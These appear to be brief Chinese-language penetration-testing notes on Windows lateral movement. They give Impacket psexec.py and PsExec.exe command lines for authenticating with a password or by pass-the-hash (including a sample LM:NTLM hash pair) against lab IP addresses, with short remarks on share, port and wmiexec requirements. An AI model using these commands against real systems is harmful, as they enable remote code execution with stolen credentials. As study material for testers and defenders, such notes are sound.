psexec/PsExec
psexec依赖于对方开启admin$共享或 c$ (该共享默认开启,依赖于445端口)
python版本
可以使用哈希或者用户名密码(格式域名或者工作组名/用户名)进行连接
python psexec.py -hashes LMhash(替换成实际的哈希):NTLMhash(替换成实际的哈希) start/yonghuming@10.211.55.6
psexec.py hacktest/administrator@10.211.55.3 -hashes AADA8EDA23213C025AE50F5CD5697D9F:6542D35ED5FF6AE5E75B875068C5D3BC
python psexec.py start/yonghuming:password@10.211.55.6
python psexec.py administrator@10.211.55.3 (交互式输入密码)
需要445端口
exe版本,Pstool
PsExec.exe \\127.0.0.1 -u start\username -p pass cmdwmiexec
局限于sid为500的用户,135端口